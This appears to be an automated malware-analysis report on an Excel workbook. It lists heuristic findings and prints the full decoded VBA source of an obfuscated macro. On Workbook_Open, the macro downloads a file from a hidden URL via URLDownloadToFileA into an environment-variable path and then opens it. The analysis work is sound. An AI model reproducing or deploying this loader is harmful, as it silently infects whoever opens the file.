Verdict: MALICIOUS
Risk Score: 276
Heuristics: 8
- Office EPRINT stream contains EMF object (high, OLE_EPRINT_EMF_OBJECT): the OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is relevant Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD): reference to the URLDownloadToFile API.
- VBA macros detected (medium, OLE_VBA_MACROS; 5 related findings): document contains VBA macro code.
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD): URLDownloadToFile in VBA. Matched line in script:
  Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal xgCsnmak0UOdotTKFJh As Long, ByVal z1Yw7ovMtSoJY As String, ByVal VDRnnOVNG36e As String, ByVal jNixJID0v8Fk As Long, ByVal qDrXg54JNFsRVJ3blUp As Long) As LongPtr
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  Set XgQM5n = CreateObject(ulQnlSI2Ai7Jm)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:
  Sub Workbook_Open()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script:
  XJERIsQVpyMe6b = Environ(kslOnBFbboL1T0fx2RV(thPTZ878(3145 - (2135) + (-1007)))) + kslOnBFbboL1T0fx2RV(thPTZ878(Hd0uq8("4VG~T")))
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3384 bytes |

SHA-256 (macros.bas): 2128e85742841066aa3355827b575f8c777fa00ef88a84eef50a3df18b8acbb9

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal xgCsnmak0UOdotTKFJh As Long, ByVal z1Yw7ovMtSoJY As String, ByVal VDRnnOVNG36e As String, ByVal jNixJID0v8Fk As Long, ByVal qDrXg54JNFsRVJ3blUp As Long) As LongPtr
#Else
Private Declare Function URLDownloadToFileA Lib "URLMON" (ByVal xgCsnmak0UOdotTKFJh As Long, ByVal z1Yw7ovMtSoJY As String, ByVal VDRnnOVNG36e As String, ByVal jNixJID0v8Fk As Long, ByVal qDrXg54JNFsRVJ3blUp As Long) As Long
#End If
Sub Workbook_Open()
FBGXAbRbNXi17QTN4
End Sub
Sub FBGXAbRbNXi17QTN4()
Dim VZzaayM
Dim thPTZ878
VZzaayM = Array(Hd0uq8("TUY;PEHXMxMESfJPj,c)"), Hd0uq8("S6Ph)h/3vTeq]^PlEy1DlYqPk.]okhAk9/{p^pKmpO/MUlP2xJibf^icy{[KaIJoxtZvKEid(=uo,yu)n:o(>"), Hd0uq8("3SZrO"), Hd0uq8("0x.1v"), Hd0uq8("18)nn"), Hd0uq8("0x.1v"), Hd0uq8("0x.1v"), Hd0uq8("0x.1v"))
thPTZ878 = Array(VZzaayM(-4492 - (-5937) + (-1445)), VZzaayM(Hd0uq8("18)nn")), VZzaayM(Hd0uq8("2o]W1")), VZzaayM(Hd0uq8("3SZrO")), VZzaayM(-6109 - (-2848) + (3265)), VZzaayM(3145 - (2135) + (-1007)), VZzaayM(3145 - (2135) + (-1007)), VZzaayM(3145 - (2135) + (-1007)))
Dim zuxeCLXHiXqOvKkM
Dim kslOnBFbboL1T0fx2RV
Dim XJERIsQVpyMe6b As String
kslOnBFbboL1T0fx2RV = Array(thPTZ878(-4492 - (-5937) + (-1445)), Hd0uq8("\U_.TzI6dI38oVqxngwNh07@(y<wi\ytNnCau6z~.Tn:Ce>hF^xD?Obeo^ce"), Hd0uq8("h-2WatJg`ktM[Z`pxP,V:`@Z;//`wC/0A7utgP<{su[7}hEBbLu+h1nk\*8dwzUu~aJE.Ls:<Y0oWj+{lF^iDa@.8Er]68F.V0f-c1Rz:oZ=XXmTij1/hYs@me5P|e?rKsdDWI<i5gt1aTS~-1npH1/-9nUfB/[+iAv_Il_hl>e..t*srDKl/ta[=nZmPsekFw.w+tX=szEy=h/SPkifg~gizE>h.l*``eRFPRxNk\Aepf;8"), thPTZ878(124 - (5535) + (5412)))
Dim FNLCjh3aWC
Set FNLCjh3aWC = XgQM5n(kslOnBFbboL1T0fx2RV(thPTZ878(-4225 - (-93) + (4134))))
XJERIsQVpyMe6b = Environ(kslOnBFbboL1T0fx2RV(thPTZ878(3145 - (2135) + (-1007)))) + kslOnBFbboL1T0fx2RV(thPTZ878(Hd0uq8("4VG~T")))
Call URLDownloadToFileA(thPTZ878(3145 - (2135) + (-1007)), kslOnBFbboL1T0fx2RV(-4225 - (-93) + (4134)), XJERIsQVpyMe6b, thPTZ878(3145 - (2135) + (-1007)), thPTZ878(Hd0uq8("3SZrO")))
FNLCjh3aWC.Open (XJERIsQVpyMe6b)
End Sub
Function XgQM5n(ulQnlSI2Ai7Jm) As Object
Set XgQM5n = CreateObject(ulQnlSI2Ai7Jm)
End Function
Function Hd0uq8(nu6rrJz As String) As String
Dim EXBRttElQ(14942 - (5798) + (-8089)) As Byte
Dim eJ5ukklcRgu() As Byte
Dim bPZgEltUihF2esJN5T
Dim LBxb3GHyxHx
eJ5ukklcRgu = StrConv(nu6rrJz, vbFromUnicode)
For LBxb3GHyxHx = 0 To UBound(eJ5ukklcRgu) - 1
If (LBxb3GHyxHx Mod 5 = (-2857 - (-1456) + (1401))) Then
EXBRttElQ(bPZgEltUihF2esJN5T) = eJ5ukklcRgu(LBxb3GHyxHx)
bPZgEltUihF2esJN5T = bPZgEltUihF2esJN5T + 1
End If
Next LBxb3GHyxHx
Hd0uq8 = Left(StrConv(EXBRttElQ, vbUnicode), bPZgEltUihF2esJN5T)
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True